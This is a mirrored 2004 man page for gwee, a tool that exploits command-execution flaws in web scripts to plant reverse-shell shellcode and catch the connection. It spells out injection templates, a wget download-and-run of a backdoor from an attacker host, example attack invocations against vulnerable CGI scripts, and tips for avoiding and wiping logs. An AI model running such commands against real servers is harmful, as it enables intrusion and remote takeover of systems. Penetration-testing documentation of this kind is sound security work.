GSP
Quick Navigator

Search Site

Unix VPS
A - Starter
B - Basic
C - Preferred
D - Commercial
MPS - Dedicated
Previous VPSs
* Sign Up! *

Support
Contact Us
Online Help
Handbooks
Domain Status
Man Pages

FAQ
Virtual Servers
Pricing
Billing
Technical

Network
Facilities
Connectivity
Topology Map

Miscellaneous
Server Agreement
Year 2038
Credits
 

USA Flag

 

 

Man Pages


Manual Reference Pages  -  GWEE (1)

NAME

gwee - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>

CONTENTS

Synopsis
Description
Options
Examples
License
Author
See Also

SYNOPSIS

gwee -h|-V
gwee options url

DESCRIPTION

gwee (generic web exploitation engine) is a small program written in C designed to exploit arbitrary command execution vulnerabilities in web scripts, such as Perl CGIs, PHP, etc. gwee is much like an exploit, except more general-purpose. It features several reverse (connecting) shellcodes (x86 Linux, FreeBSD, NetBSD, Perl script (universal), Python script (universal)), several methods of injecting (executing) them, built-in http/https client and built-in server (listener) for receiving connections (and remote shell) from injected shellcodes. gwee is distributed under the MIT License. The Perl and Python shellcodes were written by Sabu <sabu@sentinix.org>.

OPTIONS

-h Display help (you can execute gwee without arguments too).
-y string
  The parameter to insert before the shellcode injection command line is inserted. The shellcode is inserted between the values of the -y option and the -z option. In POST requests (default behaviour), the -y and -z options go into the POST data, not in the URL. In GET and HEAD requests, the "-y <shellcode> -z" option combination is appended to the URL. If you need to add a ’?’ you can do that either in the URL or as the first char of the -y option. By default, -y and -z are empty.
-z string
  String to append after the shellcode injection command. By default, the -z string is empty. An example usage of the -y -z option combo would be:

$ gwee -H -y ’?testvar=’ -z ’|’ target/cgi-bin/test.cgi

This will resolve into:

http://target/cgi-bin/test.cgi?testvar=perl -e "print <shellcode>"|

Of course, you could have done it this way too, same result:

$ gwee -z ’|’ ’target/cgi-bin/test.cgi?testvar=’

$ gwee -y testvar= -z ’|’ target/cgi-bin/test.cgi

This will resolve into:


http://target/cgi-bin/test.cgi POST data: testvar=perl -e "print <shellcode>"|
-G Use HTTP GET instead of POST. This is not recommended since nasty long tell-tail strings will end up in the access_log. In order for the whole payload to fit into a 1024 byte GET request, the shellcode is split up into 4 separate requests, all producing nasty logs. -H Use HTTP HEAD instead of POST/GET. Read about -G, the same nasty logs will appear on the target and the shellcode will be split into 4 requests.
-l your_ip_or_hostname
  The IP or hostname to have the shellcode connect back to. Hostnames will be resolved into IP numbers, since that’s the only method used by the binary shellcodes.
-p port
  The port to connect back to, default is 31337.
-s # Choose which shellcode to install on the target:

0 = Sabu’s Perl shellcode (default if -s is omitted)
1 = Linux x86 binary
2 = FreeBSD x86 binary
3 = NetBSD x86 binary
4 = Sabu’s Python shellcode (the target must have Python installed)

-i # Choose shellcode injection method:

0 = perl -e "print
1 = python -c "__import__(
2 = printf "<hex>"
3 = echo -ne "<hex>" (works only if target’s /bin/sh is bash)

-I prefix_path
  Choose a prefix to the shellcode injection method, e.g.:
-i1 -I /usr/local/bin/

that would parse it into: /usr/local/bin/python -c... default is empty (the preferred way).
-T /var/tmp/.vetx.95
  Choose a different temporary filename for the shellcode/backdoor on the target than the default.
-a user agent string
  Choose user agent string, e.g.:
   -a "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

If -a is omitted, gwee will randomize from 25 real user-agent strings.
-v Be really verbose, disclose exactly which commands are being executed.
-q Be really silent, only output error messages, nothing else.
-L Run built-in tcp listener (no need to use "nc -l").
-A Only listen for incoming connection on -p port, nothing else. This is just like: nc -l -p port -w timeout
-t seconds
  Time-out in seconds until listener (-L) times out. Default is -t30 (30 seconds), -t0 means no time-out.
-f Simply non-interactive, you don’t need to press return to proceed.
-w http://home.of.attacker/reverse_shellcode
  If you specify the -w option, the injection methods won’t be used. Instead "wget -Yoff -q -O <bd> <url>" will be executed on the target to download a reverse shellcode/backdoor that will consequently be execute as per usual. Use the -d option to dump a shellcode that you can upload somewhere.
-d outfile
  This option will dump shellcode instead of injecting it somewhere. You use the -l -p and -s options as usual, but instead of connecting somewhere, the generated shellcode will be dumped to a file you specify after the -d. Upload this file to a webserver and use it’s URL with the -w option. For example, this command will dump x86 Linux sishell:
$ gwee -lyourhostname. -p1337 -s1 -d bd
$ scp bd leet@host:/wwwroot/
$ gwee -w http://host/bd -LG -p1337 ’target/cgi-bin/vuln.cgi?’

-P Preserve the shellcode after injection. Normally, the exploit will send a HTTP POST, HEAD or GET request trying to execute "rm -f /var/tmp/.vetx.95" This will leave nasty logs even after you wipe yourself from the logs. If you know you’ll get a shell on a box, use the -P option with the -L option. Once connected with -L, it’ll automatically send a "shred -fu ; rm -f" over the connected socket.
-r Remove created backdoor file (shellcode) on the target. This is done automatically, but you still have the choice to explicitly do a remove.

EXAMPLES

gwee -y ’q=%3B’ -l fubar.org. -p 6666 -L https://target/cgi-bin/vuln.cgi
gwee -y’?cmd=’ -z’|’ -G -l mydom.tld -p 9000 -s1 -i3 -Lf target/vuln.pl
gwee -y’loginname=%3B’ -l mydom.tld -p80 -Lf https://target/userstat.pl
gwee -A -p 6666 -t0 -q

LICENSE

gwee - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

AUTHOR

My name is Michel Blomgren. I’m an information security consultant specializing in risk/vulnerability assessment and penetration testing with Cycom AB, www.cycom.se. I’m the developer of SENTINIX, a GNU/Linux distribution designed for monitoring, intrusion detection, anti-spam, anti-virus and clustering. You may contact me by sending an e-mail to <michel@cycom.se>. If you like to keep the conversation private, fetch my PGP public key on http://www.cycom.se/misc/pubkeymichel.asc (886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA).

SEE ALSO

rrs(1)
Search for    or go to Top of page |  Section 1 |  Main Index


gwee GWEE (1) May 2004

Powered by GSP Visit the GSP FreeBSD Man Page Interface.
Output converted with manServer 1.07.